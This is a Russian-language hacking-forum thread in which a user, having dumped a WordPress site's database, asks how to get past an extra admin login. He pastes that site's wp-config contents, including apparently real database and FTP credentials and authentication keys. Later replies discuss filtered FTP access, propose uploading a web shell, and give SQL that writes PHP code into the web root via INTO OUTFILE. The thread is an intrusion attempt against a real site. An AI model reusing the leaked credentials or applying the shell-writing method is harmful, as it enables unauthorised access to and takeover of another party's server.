Вход в админку вордпрес

Discussion in 'Уязвимости CMS/форумов' started by hashfinderboss, 31 Jan 2020.

  1. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    вытащил с базы админа,он там всего 1 . но при переходе в админку требуется дополнительная авторизация https://prnt.sc/qvqeam главный пароль туда не походит.


    Но в бд нашел такие данные что ниже,для чего они требуются,понимаю что к базе,но как их правильно заюзать не понимаю.как можно войти в админку ?
    через фтп клиент пробовал подключиться указав домен сайта,также пробовал ip домена указать но Winscp не конектит даже к домену(ип)

    * This file is used by the wp-config.php creation script during the\r\n * installation. You don't have to use the web site, you can just copy this file\r\n * to ""wp-config.php"" and fill in the values.\r\n *\r\n * @package WordPress\r\n */\r\n\r\n// ** MySQL settings - You can get this info from your web host ** //\r\n/** The name of the database for WordPress */\r\ndefine('DB_NAME', 'tvma_wrdp2');\r\n\r\n/** MySQL database username */\r\ndefine('DB_USER', 'tvmma_wrdp2');\r\n\r\n/** MySQL database password */\r\ndefine('DB_PASSWORD', 'eKNo1gdSoz3');\r\n\r\n/** MySQL hostname */\r\ndefine('DB_HOST', 'mysql.dol-hos.com');\r\n\r\n/** Database Charset to use in creating database tables. */\r\ndefine('DB_CHARSET', 'utf8');\r\n\r\n/** The Database Collate type. Don't change this if in doubt. */\r\ndefine('DB_COLLATE', '');\r\n/**define('WP_ALLOW_REPAIR', true);\r\n\r\n/**#@+\r\n * Authentication Unique Keys.\r\n *\r\n * Change these to different unique phrases!\r\n * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}\r\n * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.\r\n *\r\n * @since 2.6.0\r\n */\r\ndefine('AUTH_KEY', 'f7sXx[[email protected]{A56y>+eKNsoz3Xz iq\\\\Ms}?(;_a#ypaR5\\'3w<G5>FL~1X');\r\ndefine('SECURE_AUTH_KEY', '-\\""r6413E1d>}[email protected]!QPU%/!S_6;CjO0}^>6zx7No4Frj2oz3+ <?)3 U#*X;');\r\ndefine('LOGGED_IN_KEY', 'Q^l\\""6-pLe1No4Fs2oz3\\zkw>OG<U$%u0:9H:Jl)+d$~jIBTt&CS[Dp<LY4zL3y');\r\ndefine('NONCE_KEY', 'asdasdjkasdjkeKNo4Fr123jklasdjslasdkl&^%^&*(&*(jksdklaswkl&*)))');\r\n/**#@-*/\r\n\r\n/**\r\n * WordPress Database Table prefix.\r\n *\r\n * You can have multiple installations in one database if you give each a unique\r\n * prefix. Only numbers, letters, and underscores please!\r\n */\r\n$table_prefix = 'wp_';\r\ndefine('FTP_HOST', 'web2.c-host.com');\r\ndefine('FTP_USER', 'wsdme');\r\ndefine('FTP_PASS', 'shazd34');\r\n\r\n\r\n/**\r\n * WordPress Localized Language, defaults to English.\r\n *\r\n * Change this to localize WordPress. A corresponding MO file for the chosen\r\n * language must be installed to wp-content/languages. For example, install\r\n * de.mo to wp-content/languages and set WPLANG to 'de' to enable German\r\n * language support.\r\n */\r\ndefine ('WPLANG', '');\r\n\r\n/* That's all, stop editing! Happy blogging. */\r\n\r\n/** Absolute path to the WordPress directory. */\r\nif ( !defined('ABSPATH') )\r\n define('ABSPATH', dirname(__FILE__) . '/');\r\n\r\n/** Sets up WordPress vars and included files. */\r\ndefine('WP_DEBUG', false);\r\ndefine('FS_CHMOD_DIR', (0755 & ~ umask()));\r\ndefine('FS_CHMOD_FILE', (0644 & ~ umask()));\r\nrequire_once(ABSPATH . 'wp-settings.php');",2011-04-01 00:00:01
    57,0,Antonio Citterio Designer Profile,0,1,"<p>\r\n\tCelebratedItalian industrial designer Antonio Citterio partnered with Flos to create the 50<sup>th</sup> Anniversary Limited Edition Kelvin LED table lamp. The award-winning designer and architect has designed lighting and furniture for a host of leading manufacturers, including Flos, Kartell, B&amp;B Italia and many more
     
  2. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    231
    Likes Received:
    251
    Reputations:
    14
    А там вообще FTP-порт открыт?
     
  3. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    чекнул в онлайн чекере написано открыт только 21 и 443 порт.какияе могут быть варианты?
     
  4. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    231
    Likes Received:
    251
    Reputations:
    14
    Вы же вот эти данные используете, так?
     
  5. molemime

    molemime Member

    Joined:
    6 Dec 2017
    Messages:
    46
    Likes Received:
    12
    Reputations:
    0
    Открыт то он открыт, только транспорт по нему доступен не всем ip, что боле вероятно. Если это правило работает для скрипта Wordpress то скорее всего, только ему доступ и открыт. Как Вы получили содержимое этого файла вообще загадка.
     
    crlf and fandor9 like this.
  6. fandor9

    fandor9 Active Member

    Joined:
    16 Nov 2018
    Messages:
    231
    Likes Received:
    251
    Reputations:
    14
    порт кстати не открыт, а фильтруется. Так что скорее всего именно так как вы и говорите.
     
  7. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    да
     
  8. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    кроме того как зайти через ип админа,можно ли это обойти,имея бд ?
     
  9. molemime

    molemime Member

    Joined:
    6 Dec 2017
    Messages:
    46
    Likes Received:
    12
    Reputations:
    0
    Фильтрация ip и данные в бд совсем разные вещи. Грубо говоря никак.
    Честно не пойму: зачем админка если есть доступ к бд...
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Шелл лить
     
  11. molemime

    molemime Member

    Joined:
    6 Dec 2017
    Messages:
    46
    Likes Received:
    12
    Reputations:
    0
    Если шелл надо залить, можно попробовать средствами sql, идея бред конечно, но если с правами поднапутанно, то может получиться
    PHP:
    insert into `wp_posts` (`post_content`,`post_title`,`post_excerpt`,`to_ping`,`pinged`,`post_content_filtered`) values ('<?php phpinfo(); ?>','1','0','0','0','0');
     select `post_content` from `wp_posts` order by ID desc limit 1 into outfile '/var/www/html/wordpress/wp.php';
     
Loading...